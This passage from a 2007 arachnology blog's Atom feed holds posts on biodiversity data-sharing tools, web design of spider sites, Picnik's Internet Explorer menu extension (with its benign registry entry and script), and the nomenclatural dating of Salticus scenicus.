href="http://3.bp.blogspot.com/_VYUFlXOCOxE/RniWYs3qwoI/AAAAAAAAABU/dQp6ryBNmgY/s1600-h/headerH1BG.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5077973930965910146" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; CURSOR: hand" alt="" src="http://3.bp.blogspot.com/_VYUFlXOCOxE/RniWYs3qwoI/AAAAAAAAABU/dQp6ryBNmgY/s320/headerH1BG.jpg" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;The &lt;a href="http://www.gbif.org/"&gt;Global Diversity Information Facility&lt;/a&gt; (GBIF) has done an excellent job at designing the infrastructure to support the federation of specimen and observation data. The majority of contributing institutions use &lt;a href="http://digir.sourceforge.net/"&gt;Distributed Generic Information Retrieval&lt;/a&gt; (DiGIR), an open-source PHP-based package that nicely translates columns of data in one's dedicated database (e.g. MySQL, SQL Server, Oracle, etc.) into &lt;a href="http://wiki.tdwg.org/twiki/bin/view/DarwinCore/WebHome"&gt;Darwin Core&lt;/a&gt; fields. So, even if your data columns don't match the Darwin Core schema, you can use the DiGIR configurator to match your columns to what's needed at GBIF's end. Europeans tend to prefer &lt;a href="http://wiki.tdwg.org/twiki/bin/view/ABCD/WebHome"&gt;Access to Biological Collection Data&lt;/a&gt; (ABCD) as their transport mechanism. The functionality of these will soon be rolled into the &lt;a href="http://wiki.tdwg.org/twiki/bin/view/TAPIR/WebHome"&gt;TDWG Access Protocol for Information Retrieval&lt;/a&gt; (TAPIR). To the uninitiated like me, this is a jumbled, confusing alphabet soup and at first I couldn't navigate this stuff.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_VYUFlXOCOxE/Rnio083qwpI/AAAAAAAAABc/l-PUH38Gnrg/s1600-h/logo.gif"&gt;&lt;img id="BLOGGER_PHOTO_ID_5077994207506514578" style="FLOAT: left; MARGIN: 0px 10px 10px 0px; CURSOR: hand" alt="" src="http://4.bp.blogspot.com/_VYUFlXOCOxE/Rnio083qwpI/AAAAAAAAABc/l-PUH38Gnrg/s320/logo.gif" border="0" /&gt;&lt;/a&gt;Suffice it to say, the documentation isn't particularly great on either the TDWG or GBIF web sites. To the TDWG folks: &lt;em&gt;a screencast with step by step install for both Windows &amp; Linux would go a long way! I don't mean a flashy Encyclopedia of Life webcast, I mean a basic TDWG for Dummies.&lt;/em&gt; If you have a dedicated database and a web server that can push PHP-based pages, it's actually pretty straight forward once you get going. It's really just a matter of jumping through a few simple hoops. Click here; do this; match this; click there - not much more difficult than managing an Excel datasheet. The downloads &amp; step by steps for DiGIR can be found &lt;a href="http://circa.gbif.net/Public/irc/gbif/ict/library?l=/digir_provider_package"&gt;HERE&lt;/a&gt;. &lt;strong&gt;The caveat&lt;/strong&gt;: you need a dedicated database, a dedicated web server, and you need your resource to be recognized by a GBIF affiliate before it's registered for access. That's unfortunately how all this stuff works.&lt;br /&gt;&lt;br /&gt;So what about the casual or semi-professional collector that may have much larger collections than what can be found in museums? It's not terribly likely countless, hard-working people like these have the patience to fuss with dedicated databases (we're not talking Excel here) or web servers. Must they wait to donate their specimens to a museum before these extremely valuable data are made accessible? In many cases, a large donation of specimens to a museum sits in the corner and never get accessioned because there simply isn't the human power at the receiving end to manage it all. Heck, some of the pre-eminent collections in the world don't even have staff to receive donations of any size! This is a travesty.&lt;br /&gt;&lt;br /&gt;An attractive solution to this is to complement DiGIR/ABCD/TAPIR with a fully online solution akin to &lt;a href="http://docs.google.com/"&gt;Google Spreadsheets&lt;/a&gt;. For the server on the other end, this means a beefy pipe and a hefty set of machines to cope with this AJAX-style, rapid &amp;amp; continuous access. But, for small taxa-centric communities, this isn't a problem. In fact, I developed such a Google Spreadsheet-like function in The Nearctic Spider Database for collectors wanting to manage their spider data.&lt;br /&gt;&lt;br /&gt;&lt;div style="width:425px;margin:0px auto"&gt;&lt;object width="425" height="350"&gt; &lt;param name="movie" value="http://www.youtube.com/v/IVmoijJ8iro"&gt; &lt;/param&gt; &lt;embed src="http://www.youtube.com/v/IVmoijJ8iro" type="application/x-shockwave-flash" width="425" height="350"&gt; &lt;/embed&gt; &lt;/object&gt;&lt;br&gt;&lt;div style="font-size:x-small;float:right"&gt;Turn Up Volume!&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Watch the video above or &lt;a href="http://www.canadianarachnology.org/data/canada_spiders/screencasts/DataManagement/"&gt;HERE&lt;/a&gt; (better resolution). Everything is hosted on one machine on a residential Internet connection &amp; I have had up to 5 concurrent users + all the usual 2,500 - 3,500 unique visitors a day with no appreciable drop in performance. Granted things are a little slower in these instances, but the alternative is no aggregation of data at all. To help users that each have their own table in the database, I designed some easy and useful tools. For example, they may query their records for nomenclatural issues, do some real-time reverse geocoding to verify that their records are actually in the State or Province they specified, check for duplicates, among a few other goodies like mapping everything as clickable pushpins in Google Map. Of course, one can export as Excel or tab-delimited text files at any time. The other advantage to such a system is that upon receiving user feedback and requests, I can quickly add new functions &amp;amp; these are immediately available to all users. I don't have to stamp and mail out new CDs, urge them to download an update, or maintain versions of various releases. If you're curious about wanting to do the same sort of thing for your interest group, check out &lt;a href="http://dowdybrown.com/"&gt;Rico LiveGrid Plus&lt;/a&gt;, the code base upon which I built the application.&lt;br /&gt;&lt;br /&gt;What would be really cool is if this sort of thing could be made into a &lt;a href="http://drupal.org/"&gt;Drupal&lt;/a&gt;-like module &amp; bundled into &lt;a href="http://www.ubuntu.com/products/WhatIsUbuntu/serveredition"&gt;Ubuntu Server Edition&lt;/a&gt;. A taxon focal group with a community of say 20-30 contributors could collectively work on their collection data in such a manner &amp;amp; never have to think about the tough techno stuff. They'd buy a cheap little machine for $400, slide the CD into the drive to install everything &amp; away they go.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_VYUFlXOCOxE/Rniya83qwqI/AAAAAAAAABk/hzporpGXtcI/s1600-h/100014192753__V46777512_.gif"&gt;&lt;img id="BLOGGER_PHOTO_ID_5078004755946193570" style="FLOAT: left; MARGIN: 0px 10px 10px 0px; CURSOR: hand" alt="" src="http://4.bp.blogspot.com/_VYUFlXOCOxE/Rniya83qwqI/AAAAAAAAABk/hzporpGXtcI/s320/100014192753__V46777512_.gif" border="0" /&gt;&lt;/a&gt;The real advantage to the on-line data management application in the Nearctic Spider Database is the quick access to the nomenclatural data. So, the Catalog of Life Partnership &amp;amp; other major pools of names ought to think about simple web services upon which such a plug-and-go system can draw their names. It's certainly valuable to have a list of vetted names such as what ITIS and Species2000 provide, but to really sell them to funding agencies they no doubt have to demonstrate how the names are being used. Web services bundled with a little plug-and-go CD would allow small interest groups to hit the ground running. Such a tool would give real-world weight to this business of collecting names and would go a long way toward avoiding the shell games these organizations probably have to play. I suspect these countless small interest groups would pay a reasonable, annual subscription fee to keep the names pipes open. Agencies already exist to help monetize web services using such a subscription system. Perhaps it's worth thinking like an Amazon Web Service (AWS) where users pay for what they use. Unlike AWS however, incoming monies would only support the Catalog of Life Partnership wages and infrustructure to take some weight off chasing grants.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-6501083395114513570?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/6501083395114513570/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=6501083395114513570' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6501083395114513570'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6501083395114513570'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/06/digir-for-collectors.html' title='DiGIR for Collectors'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_VYUFlXOCOxE/RniWYs3qwoI/AAAAAAAAABU/dQp6ryBNmgY/s72-c/headerH1BG.jpg' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-6826875200423623343</id><published>2007-06-18T22:32:00.000-06:00</published><updated>2007-06-18T23:44:04.494-06:00</updated><title type='text'>Impossibility of Discovery</title><content type='html'>For the past couple of years, I have scoured the Internet for spider-related imagery and resources. I think I have a pretty good handle on it. But, there are some gems out there that at are near impossible to find. The discoverability issue has a lot to do with poor web design and that means little to absolutely no consideration for how search engine bots work. While it's commendable to put all that content on a website, it's equally important to ensure the work can be discovered. Many of the authors below should look at some of the offerings in &lt;a href="http://www.webpagesthatsuck.com/"&gt;Web Pages That Suck&lt;/a&gt; and pay close attention to the list of &lt;a href="http://www.webpagesthatsuck.com/biggest-mistakes-in-web-design-1995-2015.html"&gt;web design mistakes&lt;/a&gt;. Without good design, what's the point? Let it be clear that I'm not knocking the content; these are extremely valuable and obviously very time-consuming works. However, consideration must be given to the end user. Why not just get these works ready for a book &amp; let a typesetter and layout editor handle the esthetics? A few of these examples are (in no particular order):&lt;br /&gt;&lt;br /&gt;&lt;ol&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.spiderling.de/arages/Fotogalerie/Fotogalerie.htm"&gt;Nachweiskarten der Spinnentiere Deutschlands&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.andtan.newmail.ru/list/"&gt;Linyphiid Spiders of the World&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.arachnodata.ch/welcome.htm"&gt;Arachnodata&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.geocities.com/RainForest/Vines/5197/main.html"&gt;Aracnis&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.araneae.unibe.ch/"&gt;Central European Spiders - Determination Key&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;/ol&gt;&lt;br /&gt;&lt;br /&gt;Three words: kill the frames. If you have to use a frameset, give the user the option to turn it on or off.&lt;br /&gt;&lt;br /&gt;Other sites have been improving dramatically like Jørgen Lissner's &lt;a href="http://www.jorgenlissner.dk/"&gt;Spiders of Europe&lt;/a&gt;. But, it's worth thinking about a search function and also hiding the backend technology by creating URIs (i.e. aspx might be your preferred programming language, but what if you decide one day to switch to Apache and PHP?). A bit of server-side URL re-writing can go a long way to ensure longterm access to your content. If you switch to Apache, MySQL, and serve content via PHP, you can make use of Apache's mod_rewrite...none of your incoming links break.&lt;br /&gt;&lt;br /&gt;Some pointers:&lt;br /&gt;&lt;br /&gt;If you're going to use drop-down menus, please, please make them useful &amp; hierarchical by using some simple AJAX to submit a form and adjust the options. Nothing is more frustrating than scrolling through an endless list of species only to find the one you're looking for is not there or to select a species only to find no content. A list of taxonomic references is at least &lt;i&gt;some&lt;/i&gt; content even if that may seem rather thin. If Google and other search engines are having a rough time indexing your content, it is equally rough on end users. Another point is to lose the mindset that you're working with paper - the web is a highly interactive place and visitors have short attention spans. Limit the content to the most important bits. Use a pale background and dark-coloured text. Not only is printing web sites that use the reverse a pain, you are also saying, "I haven't thought about people with less than perfect vision." I could go on and on, but I'll leave it at that.&lt;br /&gt;&lt;br /&gt;If you want a web site with hundreds of arachnid-related links, visit the &lt;a href="http://www.arachnology.be/Arachnology.html"&gt;Arachnology Homepage&lt;/a&gt;. Herman Vanuytven puts a lot of time trying to make sense of all the arachnid content out there.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-6826875200423623343?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/6826875200423623343/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=6826875200423623343' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6826875200423623343'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6826875200423623343'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/06/impossibility-of-discovery.html' title='Impossibility of Discovery'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-247895766369739579</id><published>2007-06-17T21:48:00.000-06:00</published><updated>2007-06-17T22:53:09.795-06:00</updated><title type='text'>Sociology &amp; Gabbing Web Images</title><content type='html'>&lt;a href="http://4.bp.blogspot.com/_VYUFlXOCOxE/RnYHbc3qwnI/AAAAAAAAABM/aAW1qU3rg58/s1600-h/picnic2.jpg"&gt;&lt;img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/_VYUFlXOCOxE/RnYHbc3qwnI/AAAAAAAAABM/aAW1qU3rg58/s320/picnic2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5077253798094357106" /&gt;&lt;/a&gt;&lt;br /&gt;Admittedly, I'm a Flickr noob and only recently made an account for myself. I'm not entirely pleased with the interface because frankly, it's too busy and inconsistent for my liking. However, I just stumbled across &lt;a href="http://www.picnik.com"&gt;Picnik&lt;/a&gt;. From their FAQ:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;p&gt;&lt;strong&gt;What is Picnik?&lt;/strong&gt;&lt;br /&gt;Picnik is photo editing awesomeness, online, in your browser. It's the easiest way on the Web to fix underexposed photos, remove red-eye, or apply effects to your photos. &lt;/p&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Not only that, it is well hooked into Flickr, Facebook and a number of other sites. What struck me about one of the features in their somewhat hidden tools are Firefox and Internet Explorer extensions. Now, extensions in Firefox are relatively easy to construct, but Internet Explorer extensions are a bit of a pain. So, I was curious to see what they did. It is a registry hack that contains the following:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;p&gt;Windows Registry Editor Version 5.00; See http://msdn.microsoft.com/workshop/browser/ext/tutorials/context.asp for details&lt;br /&gt;[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Edit in &amp;Picnik] @="http://www.picnik.com/extensions/ie-import.html"&lt;br /&gt;"Contexts"=dword:00000002&lt;/p&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_VYUFlXOCOxE/RnYEgc3qwmI/AAAAAAAAABE/n52gzmyfSKE/s1600-h/picnic.jpg"&gt;&lt;img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/_VYUFlXOCOxE/RnYEgc3qwmI/AAAAAAAAABE/n52gzmyfSKE/s320/picnic.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5077250585458819682" /&gt;&lt;/a&gt;That hack installs an option in the right-click context menu within Internet Explorer. When the hack is installed, you may right-click any image on a web page and choose "Edit in Picnik". I tried it and of course, the URL to the image is seamlessly grabbed and the image is immeditalely available in Picnik for editing using its rich array of very easy to use tools.&lt;br /&gt;&lt;br /&gt;Being naturally curious, I pointed the URL in that above registry hack to http://www.picnik.com/extensions/ie-import.html and was presented with a web page alert whose source was the following:&lt;br /&gt;&lt;br /&gt;&amp;lt;html&amp;gt;&amp;lt;body&amp;gt;&lt;br /&gt;&amp;lt;script&amp;gt;&lt;br /&gt;// See http://msdn.microsoft.com/workshop/browser/ext/tutorials/context.asp for details&lt;br /&gt;try {&lt;br /&gt; var wndParent = external.menuArguments;&lt;br /&gt; var strImportURL = wndParent.event.srcElement.src;&lt;br /&gt; wndParent.location = "http://www.picnik.com/?import=" + strImportURL;&lt;br /&gt;} catch (ex) {&lt;br /&gt; alert("Unable to import image. Let us know at feedback@picnik.com");&lt;br /&gt;}&lt;br /&gt;&amp;lt;/script&amp;gt;&lt;br /&gt;Edit in Picnik for Internet Explorer&lt;br /&gt;&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;&lt;br /&gt;&lt;br /&gt;So, it seems the registry hack merely calls the URL to an image and feeds it as a querystring parameter into Picnik. Pretty slick. But there's more...&lt;br /&gt;&lt;br /&gt;You can grab any image like this, edit it in Picnik, then seamlessly send it to your Flickr account using the behind-the-scenes Flickr API. Technically, you never have to interface with the busy Flickr site. Almost everything can be done within Picnik from grabbing either a local image from your hard drive, web site, etc., editing it using its fully online, smooth and easy to use image editing tools, then you can push the result out to Flickr or Facebbok, send it via email, save it back to your hard drive, plus a number of other export options. Wow.&lt;br /&gt;&lt;br /&gt;Grabbing images like this off a web page &amp; then sending it off to Flickr certainly has some serious copyright issues and speaks volumes about the sociology of the web culture. This is exactly the kind of content ownership issues that seem not to phase other emerging application developers like those behind &lt;a href="http://www.zude.com"&gt;Zude&lt;/a&gt; or &lt;a href="http://www.zcubes.com"&gt;ZCubes&lt;/a&gt;. Where's the justice? Do &lt;a href="http://creativecommons.org/"&gt;Creative Commons&lt;/a&gt; licenses make a whole hill of beans worth of difference when there are tools like these? I tried to get this notion across to the participants &amp; contributors in/to &lt;a href="http://bugguide.net"&gt;BugGuide&lt;/a&gt; (see &lt;a href="http://bugguide.net/node/view/112709"&gt;discussion&lt;/a&gt;) as encouragement to think about an API to propagate their great work in other resources like the &lt;a href="http://www.eol.org"&gt;Encyclopedia of Life&lt;/a&gt;. There are lots of synergistic reasons for building a simple API. BugGuide is a rich, longstanding, community-driven resource for people to post their images of NA arthropods, author guide pages, discuss issues in a forum, among other really useful functions. Getting nomenclatural data from an Encyclopedia of Life API would be one simple example of potential information flow back to BugGuide.&lt;br /&gt;&lt;br /&gt;One of the shortcomings of Picnik, Zude, and ZCubes is that there is no way to retain any accreditation other than the host domain for where the image was "ripped". It also means that MediaRSS extensions for RSS 2.0 or the FOAF and Dublin Core vocabularies for RSS 1.0 are entirely useless in this context because they aren't being used even if the data were available. What I think Picnik, Zude, and ZCubes (&amp; Flickr too for that matter) ought to consider is an embedded meta data reader/writer for images. If this is so commonly done with MP3 music files, why is this taking so long for image files?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-247895766369739579?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/247895766369739579/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=247895766369739579' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/247895766369739579'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/247895766369739579'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/06/sociology-gabbing-web-images.html' title='Sociology &amp; Gabbing Web Images'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_VYUFlXOCOxE/RnYHbc3qwnI/AAAAAAAAABM/aAW1qU3rg58/s72-c/picnic2.jpg' height='72' width='72'/><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-6725915474885323811</id><published>2007-06-13T14:54:00.000-06:00</published><updated>2007-10-25T13:38:10.871-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='spiders'/><title type='text'>Salticus scenicus (Clerck, 1757)</title><content type='html'>To date, I haven't posted anything about spiders. This blog is at its heart about araneids afterall, so I may as well get started on an interesting tidbit.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_VYUFlXOCOxE/RnBbh83qwlI/AAAAAAAAAA8/_XcR7mOd_O8/s1600-h/dps1.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5075657418879976018" style="FLOAT: left; CURSOR: hand; MARGIN-RIGHT: 5px" alt="" src="http://4.bp.blogspot.com/_VYUFlXOCOxE/RnBbh83qwlI/AAAAAAAAAA8/_XcR7mOd_O8/s320/dps1.jpg" border="0" /&gt;&lt;/a&gt;Here's a shot of a male &lt;em&gt;Salticus scenicus&lt;/em&gt; (Clerck, 1757). I found this guy in my kitchen, busy terrorizing my 75 pound black, Labrador Retriever. I rushed to get the camera, took several shots, and tried my best to maintain a steady hand. While on knees and elbows, a large, wet tongue repeatedly sought appeasement in my left ear. Later, I submitted the image, locality, and a few comments to &lt;a href="http://www.spiderwebwatch.org/"&gt;Spider WebWatch&lt;/a&gt; because it's one of the nine species featured in that citizen science initiative. With prodding from a few folks, I designed the backend and layout for Spider WebWatch. It's a bit like a forum or a blog where participants can quickly click a spot on a Google Map, pick a date, type a free-form observation, and upload an image. Other participants can submit comments on individual observations and everything I could think of has an RSS 2.0 feed with GeoRSS and MediaRSS extensions. In other words, if you're so inclined, you can grab these feeds and images and maintain textual accreditation for these contributions. I also have a dynamically created Google Earth download; the locales and observations are fed from the server to your machine when called such that you don't have to download a large Google Earth file...it's a bit like the &lt;a href="http://earth.google.com/santa/"&gt;Google Earth Santa tracker&lt;/a&gt; in that regard.&lt;br /&gt;&lt;br /&gt;Anyhow, on to more interesting matters...&lt;br /&gt;&lt;br /&gt;Astute adherents to the International Code of Zoological Nomenclature will notice the date &lt;em&gt;Salticus scenicus&lt;/em&gt; was described: 1757. Directly from the ICZN is the following:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;Article 3. Starting point. The date 1 January 1758 is arbitrarily fixed in this Code as the date of the starting point of zoological nomenclature.&lt;br /&gt;&lt;br /&gt;3.1.Works and names published in 1758. Two works are deemed to have been published on 1 January 1758:&lt;br /&gt;- Linnaeus's Systema Naturae, 10th Edition;&lt;br /&gt;- Clerck's Aranei Svecici.&lt;br /&gt;Names in the latter have precedence over names in the former, but names in any other work published in 1758 are deemed to have been published after the 10th Edition of Systema Naturae.&lt;br /&gt;&lt;br /&gt;3.2. Names, acts and information published before 1758. No name or nomenclatural act&lt;br /&gt;published before 1 January 1758 enters zoological nomenclature, but information(such as descriptions or illustrations) published before that date may be used. (See Article 8.7.1 for the status of names, acts and information in works published after 1757 which have been suppressed for nomenclatural purposes by&lt;br /&gt;the Commission).&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;There apparently has been plenty of bickering about Clerck's 1757 &lt;em&gt;Aranei Svecici&lt;/em&gt;, which of course was published before Linnaeus' &lt;em&gt;Systema Naturae&lt;/em&gt;. The full reference is:&lt;br /&gt;&lt;br /&gt;Clerck, C. 1757. &lt;em&gt;Svenska spindlar, uti sina hufvud-slågter indelte samt under några och sextio särskildte arter beskrefne och med illuminerade figurer uplyste. Stockholmiae&lt;/em&gt;, 154 pp.&lt;br /&gt;&lt;br /&gt;According to Article 3.1 of the ICZN, the authorship for &lt;em&gt;Salticus scenicus&lt;/em&gt; ought to be 1758 yet arachnid systematists (not naming names) have fought tooth and nail to preserve full recognition/respect for Clerck's work. Clerck orginally described this species as &lt;em&gt;Araneus scenicus&lt;/em&gt;; the Genus &lt;em&gt;Araneus&lt;/em&gt; was a veritable trash bin for a lot of spiders. Linnaeus redescribed the species as &lt;em&gt;Aranea scenica&lt;/em&gt; in 1758, also a trash bin. So who's the authority? In case you're interested, the spiders in Linnaeus' tome are:&lt;br /&gt;&lt;br /&gt;Linnaeus, C. &lt;em&gt;Systema naturae per regna tria naturae, secundum classes, ordines, genera, species cum characteribus differentiis, synonymis, locis. Editio decima, reformata&lt;/em&gt;. Holmiae, 821 pp. (Araneae, pp. 619-624).&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-6725915474885323811?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/6725915474885323811/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=6725915474885323811' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6725915474885323811'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6725915474885323811'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/06/salticus-scenicus-clerck-1757.html' title='&lt;i&gt;Salticus scenicus&lt;/i&gt; (Clerck, 1757)'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_VYUFlXOCOxE/RnBbh83qwlI/AAAAAAAAAA8/_XcR7mOd_O8/s72-c/dps1.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-3687707625005517467</id><published>2007-06-10T22:36:00.000-06:00</published><updated>2007-10-06T14:41:36.785-06:00</updated><title type='text'>Gimme That Scientific Paper! Part II</title><content type='html'>If you're wanting to make textual lists of online references more useful for visitors to your page(s) such that you can turn references like this:&lt;br /&gt;&lt;br /&gt;Work, Timothy T., David P. Shorthouse, John R. Spence, W. Jan A. Volney, David Langor. 2004. Stand composition and structure of the boreal mixedwood and epigaeic arthropods of the Ecosystem Management Emulating Natural Disturbance (EMEND) landbase in northwestern Alberta. &lt;i&gt;Can. J. For. Res.&lt;/i&gt; &lt;b&gt;34(2)&lt;/b&gt;: 417–430.&lt;br /&gt;&lt;br /&gt;Into this:&lt;br /&gt;&lt;br /&gt;&lt;p&gt;&lt;span id="bioguidref_1"&gt;Work, Timothy T., David P. Shorthouse, John R. Spence, W. Jan A. Volney, David Langor. 2004. Stand composition and structure of the boreal mixedwood and epigaeic arthropods of the Ecosystem Management Emulating Natural Disturbance (EMEND) landbase in northwestern Alberta. &lt;i&gt;Can. J. For. Res.&lt;/i&gt; &lt;b&gt;34(2)&lt;/b&gt;: 417–430.&lt;/span&gt;&lt;img src="http://www.canadianarachnology.org/bioGUID/magnifier.png" alt="Search!" title="Search!" height="16px" width="16px" style="border:0px; margin:0px;padding:0px"&gt;&lt;/p&gt; [Doesn't work here because of Blogger constraints]&lt;br /&gt;&lt;br /&gt;Where the little magnifying glass allow visitors to your page to search for the paper without having to maintain the links, all you need to do is download this:&lt;br /&gt;&lt;a href="http://www.canadianarachnology.org/bioGUID/bioGUID.js"&gt;http://www.canadianarachnology.org/bioGUID/bioGUID.js&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;And follow the brief instructions in the JavaScript file. There's next to no additional mark-up required for the lists of papers (see &lt;a href="http://ispiders.blogspot.com/2007/06/gimme-that-scientific-paper.html#comment-4097869681642704180"&gt;Here&lt;/a&gt; in the comments section of a previous post). The script makes use of some cross-domain Flash, which requires that your domain be added to Rod Page's &lt;a href="http://bioguid.info"&gt;bioGUID&lt;/a&gt; reference parser. However, I included some simple php and asp examples to step around that constraint and also a link to an online file storage service where you can get all the images I used or directly accessible here: &lt;a href="http://www.box.net/shared/685i4nyxxj#1:7066241"&gt;http://www.box.net/shared/685i4nyxxj#1:7066241&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-3687707625005517467?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/3687707625005517467/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=3687707625005517467' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/3687707625005517467'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/3687707625005517467'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/06/gimme-that-scientific-paper-part-ii.html' title='Gimme That Scientific Paper! Part II'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-8950331493240735674</id><published>2007-06-05T00:11:00.000-06:00</published><updated>2007-06-05T00:36:03.860-06:00</updated><title type='text'>Fun With RSS</title><content type='html'>Seems Google has finally jumped on the &lt;a href="http://search.yahoo.com/mrss"&gt;MediaRSS&lt;/a&gt; bandwagon. For some time now, I have been producing MediaRSS as well as simple &lt;a 